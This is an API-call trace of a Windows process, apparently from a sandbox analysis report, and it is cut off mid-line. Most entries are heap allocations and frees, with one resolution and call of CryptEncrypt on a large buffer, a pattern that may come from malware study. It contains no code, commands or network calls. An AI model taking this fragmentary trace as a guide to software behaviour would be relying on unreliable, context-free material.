[0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eee068 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.622] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.622] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ede760 [0128.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ede760 | out: hHeap=0x970000) returned 1 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0128.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0128.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0128.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0128.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c80 [0128.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.635] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544e0 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0128.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0128.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0128.636] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ecee58*, pdwDataLen=0x8cef60*=0xf8fc, dwBufLen=0xf900 | out: pbData=0x2ecee58*, pdwDataLen=0x8cef60*=0xf900) returned 1 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: 